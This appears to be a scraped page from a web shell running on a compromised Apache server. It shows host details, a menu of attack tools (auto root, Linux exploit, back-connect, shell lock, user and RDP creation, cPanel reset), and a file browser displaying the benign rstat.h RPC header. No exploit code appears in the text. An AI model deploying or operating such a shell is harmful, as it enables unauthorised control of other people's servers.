Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.223.195.127
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
include /
rpcsvc /
[ HOME SHELL ]
Name
Size
Permission
Action
bootparam.h
911
B
-rw-r--r--
bootparam_prot.h
3.11
KB
-rw-r--r--
bootparam_prot.x
3.05
KB
-rw-r--r--
key_prot.h
6.6
KB
-rw-r--r--
key_prot.x
6.41
KB
-rw-r--r--
klm_prot.h
3.21
KB
-rw-r--r--
klm_prot.x
3.65
KB
-rw-r--r--
mount.h
3.77
KB
-rw-r--r--
mount.x
4.56
KB
-rw-r--r--
nfs_prot.h
11.18
KB
-rw-r--r--
nfs_prot.x
7.8
KB
-rw-r--r--
nis.h
15.83
KB
-rw-r--r--
nis.x
16.41
KB
-rw-r--r--
nis_callback.h
2.64
KB
-rw-r--r--
nis_callback.x
2.13
KB
-rw-r--r--
nis_object.x
12.78
KB
-rw-r--r--
nis_tags.h
5.24
KB
-rw-r--r--
nislib.h
12.69
KB
-rw-r--r--
nlm_prot.h
9.15
KB
-rw-r--r--
nlm_prot.x
4.87
KB
-rw-r--r--
rex.h
5.13
KB
-rw-r--r--
rex.x
7.25
KB
-rw-r--r--
rquota.h
5.42
KB
-rw-r--r--
rquota.x
3.39
KB
-rw-r--r--
rstat.h
3.95
KB
-rw-r--r--
rstat.x
3.91
KB
-rw-r--r--
rusers.h
3.2
KB
-rw-r--r--
rusers.x
5.73
KB
-rw-r--r--
sm_inter.h
3.1
KB
-rw-r--r--
sm_inter.x
3.66
KB
-rw-r--r--
spray.h
1.84
KB
-rw-r--r--
spray.x
2.48
KB
-rw-r--r--
yp.h
9.68
KB
-rw-r--r--
yp.x
7.03
KB
-rw-r--r--
yp_prot.h
10.25
KB
-rw-r--r--
ypclnt.h
3.51
KB
-rw-r--r--
yppasswd.h
1.25
KB
-rw-r--r--
yppasswd.x
2.23
KB
-rw-r--r--
ypupd.h
2.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rstat.h
/* * Please do not edit this file. * It was generated using rpcgen. */ #ifndef _RSTAT_H_RPCGEN #define _RSTAT_H_RPCGEN #include <rpc/rpc.h> #ifdef __cplusplus extern "C" { #endif #ifndef FSCALE /* * Scale factor for scaled integers used to count load averages. */ #define FSHIFT 8 /* bits to right of fixed binary point */ #define FSCALE (1<<FSHIFT) #endif /* ndef FSCALE */ #define CPUSTATES 4 #define DK_NDRIVE 4 struct rstat_timeval { u_int tv_sec; u_int tv_usec; }; typedef struct rstat_timeval rstat_timeval; struct statstime { int cp_time[CPUSTATES]; int dk_xfer[DK_NDRIVE]; u_int v_pgpgin; u_int v_pgpgout; u_int v_pswpin; u_int v_pswpout; u_int v_intr; int if_ipackets; int if_ierrors; int if_oerrors; int if_collisions; u_int v_swtch; int avenrun[3]; rstat_timeval boottime; rstat_timeval curtime; int if_opackets; }; typedef struct statstime statstime; struct statsswtch { int cp_time[CPUSTATES]; int dk_xfer[DK_NDRIVE]; u_int v_pgpgin; u_int v_pgpgout; u_int v_pswpin; u_int v_pswpout; u_int v_intr; int if_ipackets; int if_ierrors; int if_oerrors; int if_collisions; u_int v_swtch; u_int avenrun[3]; rstat_timeval boottime; int if_opackets; }; typedef struct statsswtch statsswtch; struct stats { int cp_time[CPUSTATES]; int dk_xfer[DK_NDRIVE]; u_int v_pgpgin; u_int v_pgpgout; u_int v_pswpin; u_int v_pswpout; u_int v_intr; int if_ipackets; int if_ierrors; int if_oerrors; int if_collisions; int if_opackets; }; typedef struct stats stats; #define RSTATPROG 100001 #define RSTATVERS_TIME 3 #if defined(__STDC__) || defined(__cplusplus) #define RSTATPROC_STATS 1 extern statstime * rstatproc_stats_3(void *, CLIENT *); extern statstime * rstatproc_stats_3_svc(void *, struct svc_req *); #define RSTATPROC_HAVEDISK 2 extern u_int * rstatproc_havedisk_3(void *, CLIENT *); extern u_int * rstatproc_havedisk_3_svc(void *, struct svc_req *); extern int rstatprog_3_freeresult (SVCXPRT *, xdrproc_t, caddr_t); #else /* K&R C */ #define RSTATPROC_STATS 1 extern statstime * rstatproc_stats_3(); extern statstime * rstatproc_stats_3_svc(); #define RSTATPROC_HAVEDISK 2 extern u_int * rstatproc_havedisk_3(); extern u_int * rstatproc_havedisk_3_svc(); extern int rstatprog_3_freeresult (); #endif /* K&R C */ #define RSTATVERS_SWTCH 2 #if defined(__STDC__) || defined(__cplusplus) extern statsswtch * rstatproc_stats_2(void *, CLIENT *); extern statsswtch * rstatproc_stats_2_svc(void *, struct svc_req *); extern u_int * rstatproc_havedisk_2(void *, CLIENT *); extern u_int * rstatproc_havedisk_2_svc(void *, struct svc_req *); extern int rstatprog_2_freeresult (SVCXPRT *, xdrproc_t, caddr_t); #else /* K&R C */ extern statsswtch * rstatproc_stats_2(); extern statsswtch * rstatproc_stats_2_svc(); extern u_int * rstatproc_havedisk_2(); extern u_int * rstatproc_havedisk_2_svc(); extern int rstatprog_2_freeresult (); #endif /* K&R C */ #define RSTATVERS_ORIG 1 #if defined(__STDC__) || defined(__cplusplus) extern stats * rstatproc_stats_1(void *, CLIENT *); extern stats * rstatproc_stats_1_svc(void *, struct svc_req *); extern u_int * rstatproc_havedisk_1(void *, CLIENT *); extern u_int * rstatproc_havedisk_1_svc(void *, struct svc_req *); extern int rstatprog_1_freeresult (SVCXPRT *, xdrproc_t, caddr_t); #else /* K&R C */ extern stats * rstatproc_stats_1(); extern stats * rstatproc_stats_1_svc(); extern u_int * rstatproc_havedisk_1(); extern u_int * rstatproc_havedisk_1_svc(); extern int rstatprog_1_freeresult (); #endif /* K&R C */ /* the xdr functions */ #if defined(__STDC__) || defined(__cplusplus) extern bool_t xdr_rstat_timeval (XDR *, rstat_timeval*); extern bool_t xdr_statstime (XDR *, statstime*); extern bool_t xdr_statsswtch (XDR *, statsswtch*); extern bool_t xdr_stats (XDR *, stats*); #else /* K&R C */ extern bool_t xdr_rstat_timeval (); extern bool_t xdr_statstime (); extern bool_t xdr_statsswtch (); extern bool_t xdr_stats (); #endif /* K&R C */ #ifdef __cplusplus } #endif #endif /* !_RSTAT_H_RPCGEN */
Close